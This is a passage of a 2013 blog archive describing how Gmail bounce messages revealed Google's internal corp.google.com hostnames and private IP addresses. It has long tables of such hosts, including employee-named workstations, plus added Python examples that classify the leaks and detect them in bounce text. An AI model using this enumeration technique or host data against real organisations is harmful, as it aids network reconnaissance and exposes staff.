<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">trade1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.215.182</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">boss1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.83.209, 172.19.68.53</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">edgar1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.19.150.252</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">phoenix1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.145.248</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">gilberto1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.118.175, 172.19.54.117</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">deven1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.19.16.16</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">luciano1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.23.72.189</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">kieran1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.19.66.67</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jar1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.71.95</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">mix1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.115.199</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">angelo1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.28.114.91</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">khalid1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.26.231.132</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">freddy1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.29.164.22</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">brewer1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.19.45.123</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">philip1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.16.61.165</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rgupta1-w.ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.19.37.40</span></td></tr>
</tbody></table>
</div>
<div>
<br /></div>
<div>
Judging by the names, it looks like these machines are workstations used by Google employees.</div>
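<div style="text-align: justify;">What a leak like this actually hands to a reader is worth making explicit, so here is an added example (not code from the post) that takes a few rows from the table above and records, per host, whether the name follows the user-prefixed workstation pattern and which non-routable block each address falls in. The "&lt;user&gt;1-w" pattern is an assumption read off the listed names, and the function names are this example's own.</div>

```python
import ipaddress
import re

# Rows copied from the table in this post: hostname and the address(es) listed beside it.
LEAKED_ROWS = [
    ("bbudge1-w.ad.corp.google.com", "172.22.71.111"),
    ("jfarrell1-w.ad.corp.google.com", "100.100.63.199"),
    ("bedlam.ad.corp.google.com", "172.25.100.6"),
    ("boss1-w.ad.corp.google.com", "172.17.83.209, 172.19.68.53"),
    ("gilberto1-w.ad.corp.google.com", "172.22.118.175, 172.19.54.117"),
]

# Address blocks that are never routed on the public Internet. Checked explicitly rather
# than via ipaddress.is_private, which does not treat 100.64.0.0/10 as private.
NON_PUBLIC_BLOCKS = {
    "RFC 1918 10.0.0.0/8": ipaddress.ip_network("10.0.0.0/8"),
    "RFC 1918 172.16.0.0/12": ipaddress.ip_network("172.16.0.0/12"),
    "RFC 1918 192.168.0.0/16": ipaddress.ip_network("192.168.0.0/16"),
    "RFC 6598 shared space 100.64.0.0/10": ipaddress.ip_network("100.64.0.0/10"),
}

# Assumed naming pattern, read off the listed names: "<user>1-w" under ad.corp.google.com.
WORKSTATION_NAME = re.compile(r"^(?P<user>[a-z]+)1-w\.ad\.corp\.google\.com$")


def classify_address(addr: str) -> str:
    """Label of the non-public block the address falls in, or 'public'."""
    ip = ipaddress.ip_address(addr)
    for label, block in NON_PUBLIC_BLOCKS.items():
        if ip in block:
            return label
    return "public"


def analyse_row(hostname: str, addr_field: str) -> dict:
    """What one bounce-derived row reveals: naming pattern, user prefix, address blocks."""
    match = WORKSTATION_NAME.match(hostname)
    addresses = [a.strip() for a in addr_field.split(",")]
    return {
        "hostname": hostname,
        "user_prefix": match.group("user") if match else None,
        "multi_homed": len(addresses) > 1,
        "blocks": [classify_address(a) for a in addresses],
    }


def summarise(rows=LEAKED_ROWS) -> dict:
    """Aggregate view over all rows: how much of the internal layout was disclosed."""
    results = [analyse_row(h, a) for h, a in rows]
    all_blocks = [b for r in results for b in r["blocks"]]
    return {
        "hosts": len(results),
        "workstation_pattern": sum(1 for r in results if r["user_prefix"]),
        "addresses": len(all_blocks),
        "all_non_public": all(b != "public" for b in all_blocks),
        "blocks_seen": sorted(set(all_blocks)),
    }


if __name__ == "__main__":
    for row in LEAKED_ROWS:
        print(analyse_row(*row))
    print(summarise())
```

<div style="text-align: justify;">Every address in the table is RFC 1918 or RFC 6598 space, so the bounce messages disclose internal addressing and a username-to-workstation mapping that is otherwise invisible from outside; the mitigation on the mail side is to have the edge MTA rewrite or suppress internal hostnames and addresses in non-delivery reports.</div>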
<div><b>Scanning for Google's internal corporate subdomains - part 2</b> (2013-11-25)</div>
And here are some more domain names:<br />
<table>
<tbody>
<tr><td><b>Hostname</b></td><td><b>IP address</b></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hulk.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.26.191.134</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">coffee.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.66.19</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">flip.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.95.138</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">pizza.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.104.4.37</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">pond.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.118.28</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">welcome.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.172.92</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">nonprofit.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.115.13</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ship.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.108.124</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lens.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.94.141</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">miracle.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.122.67</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jet.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.29.86.122</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">unity.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.206.3</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">twist.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.104.42.23</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">uncertainty.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.108.157</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">seal.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.8.84</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jeans.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.72.81</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bolt.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.98.178</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bow.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.112.36</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sunny.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.82.125</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">shark.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.28.149.4</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">buddy.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.115.127</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">peanut.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.102.44</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rain.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.80.52</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">pile.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.133.81</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">twist.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.104.42.23</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bull.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.103.54</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sheep.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.86.154</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hurricane.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.84.167</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">robot.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.115.107</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">brain.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.90.153</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">search.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.16.255.28</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cut.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.8.65</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hero.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.172.24</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">river.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.84.63</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ear.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.117.91</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">engage.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.121.235</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">gift.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.31.70.65</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sugar.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.97.53</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">analyst.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.196.24</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">jury.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.184.119</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">pocket.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.26.64.54</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">earth.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.27.22.33</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">bear.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.64.65</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">cash.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.82.80</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">predict.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.115.33</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">brown.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.117.56</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ad.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[2620:0:10c0:115b:d6ae:52ff:fe72:375b], [2620:0:10c1:1130:862b:2bff:fe01:bb49], [2620:0:10c1:1130:862b:2bff:fe01:b86a], [2620:0:10c0:1157:7a2b:cbff:fe40:8b45], [2620:0:10c8:111f:7a2b:cbff:fe22:ac0a], [2620:0:10cc:1109:7a2b:cbff:fe1e:a39c], [2620:0:10c0:1155:7a2b:cbff:fe40:9863], [2620:0:10cc:1109:7a2b:cbff:fe1e:b48c], [2620:0:10c1:1130:862b:2bff:fe01:b710], [2620:0:10c8:1120:7a2b:cbff:fe51:4505] 172.25.118.210 172.24.204.11, 172.25.119.213, 172.25.118.69, 172.24.156.19, 172.24.204.12, 172.16.255.204, 172.25.152.139, 172.24.156.20, 172.25.152.208, 172.24.204.10</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">anywhere.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.123.28</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">forth.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.117.154</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">secret.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.113.69</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">shade.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.122.96</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">element.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.116.103</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">spot.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.219.36</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">prompt.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.28.12.24</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sun.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.92.133</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">quit.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">127.0.0.1</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">ice.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.17.90.17</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">silent.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.117.137</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">creative.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.24.194.41</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">rocket.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.104.26.42</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">perfect.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">100.104.7.16</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">lady.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.28.15.15</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">chip.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.114.129</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">green.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[2620:0:1000:3803:a800:1ff:fe00:4e9b], 172.24.98.22</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">iron.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.98.108</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">king.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[::ffff:172.16.255.48], 172.16.255.48</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">visible.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.114.89</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">crack.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.124.73</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">galaxy.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.82.132</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">sand.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.109.255</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">knife.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.121.170</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">pole.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.25.67.53</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">free.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.104.61</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">shell.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">192.168.132.163</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">tomato.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.64.67</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">spot.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.219.36</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">evolution.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.22.124.99</span></td></tr>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hudson.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.56.49</span></td></tr>
</tbody></table>
<div>
Scanning for Google's internal corporate subdomains (published 2013-11-22)</div>
For some reason Gmail appears to use an internal DNS server. This makes it possible to verify the existence of Google's internal corporate domain names, and even to resolve their IP addresses. For example, if you send an e-mail to test@root.corp.google.com you will receive an error response:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIz6VwF6MBz-oFLO3Mcil87gMUshzJbddFpliHrTeBme9QrDcDv1RSpBmbcjezTIqWrBvXNvXim5F9t3HNGfa_9zhXizlPrxvBaQVrgsOMyHnya8goOaXUTSry38d5E0Mei9Y-NiP2g9g/s1600/Screenshot+from+2013-11-22+13:06:36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIz6VwF6MBz-oFLO3Mcil87gMUshzJbddFpliHrTeBme9QrDcDv1RSpBmbcjezTIqWrBvXNvXim5F9t3HNGfa_9zhXizlPrxvBaQVrgsOMyHnya8goOaXUTSry38d5E0Mei9Y-NiP2g9g/s320/Screenshot+from+2013-11-22+13:06:36.png" width="320" /></a></div>
<br />
So apparently there's a server located at <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root.corp.google.com</span> and its IP address is <span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.16.115.10</span>.<br />
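As an added, defender-side example (not the author's code), here is the check a mail administrator could run over outbound bounce text to catch the kind of leak the post describes: internal hostnames and private or loopback addresses surfacing in a non-delivery report. The internal suffix <span style="font-family: Courier New, Courier, monospace;">.corp.example.com</span> and the sample bounce text are constructed for the example.

```python
"""Detect internal name-resolution results leaking through bounce / NDR text.

Added example, not the blog author's code. The internal suffix and the
sample bounce are constructed for illustration.
"""
import ipaddress
import re

# Suffix that marks internal corporate hostnames (assumption for this example).
INTERNAL_SUFFIX = ".corp.example.com"

# Hostnames and IP literals, optionally wrapped in [] as MTAs print them.
# A leading ':' is allowed so IPv6 forms such as [::ffff:10.0.0.1] are captured.
_TOKEN_RE = re.compile(r"\[?[A-Za-z0-9:][A-Za-z0-9:.\-]*[A-Za-z0-9]\]?")


def classify_ip(literal):
    """Return 'loopback', 'private' or 'public' for an IP literal, else None."""
    try:
        ip = ipaddress.ip_address(literal.strip("[]"))
    except ValueError:
        return None                      # hostname, timestamp, plain word ...
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped              # [::ffff:172.16.255.48] -> 172.16.255.48
    if ip.is_loopback:
        return "loopback"
    if ip.is_private:
        return "private"
    return "public"


def find_leaks(bounce_text, internal_suffix=INTERNAL_SUFFIX):
    """Return sorted (kind, value) pairs for every internal hostname and every
    private or loopback address that appears in the bounce text."""
    findings = set()
    for raw in _TOKEN_RE.findall(bounce_text):
        token = raw.strip("[]")
        kind = classify_ip(token)
        if kind in ("private", "loopback"):
            findings.add((kind, token))
        elif kind is None:
            # Drop a trailing ":port" before comparing against the suffix.
            name = re.sub(r":\d+$", "", token)
            if name.lower().endswith(internal_suffix):
                findings.add(("internal-host", name))
    return sorted(findings)


def redact(bounce_text, internal_suffix=INTERNAL_SUFFIX):
    """Return the bounce text with each leaked value replaced by [redacted]."""
    out = bounce_text
    for _kind, value in find_leaks(bounce_text, internal_suffix):
        out = out.replace(value, "[redacted]")
    return out


# Constructed bounce text modelled on the post's description; not a real NDR.
SAMPLE_BOUNCE = """\
Delivery to the following recipient failed permanently:
     test@root.corp.example.com
Technical details of permanent failure:
The recipient server did not accept our requests to connect.
[root.corp.example.com. 172.16.115.10: Connection refused]
[shell.corp.example.com. [::ffff:192.168.132.163]: timed out]
Relayed via mx.example.com 216.239.44.190 at 2013-11-22 13:06:36
"""

if __name__ == "__main__":
    for kind, value in find_leaks(SAMPLE_BOUNCE):
        print(f"{kind:14} {value}")
    print(redact(SAMPLE_BOUNCE))
```

Running the module prints the four findings from the sample and the redacted text; public addresses such as the relay's stay untouched.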
Here's a list of some of these domain names (of course it's not comprehensive).<br />
Some companies:<br />
<div>
<br />
Google's corporate structure:</div>
<div>
<table>
<tbody>
<tr><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">marketing.corp.google.com</span></td><td><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">172.18.77.12</span></td></tr>
</tbody></table>
<br />
And a lot of other words:</div>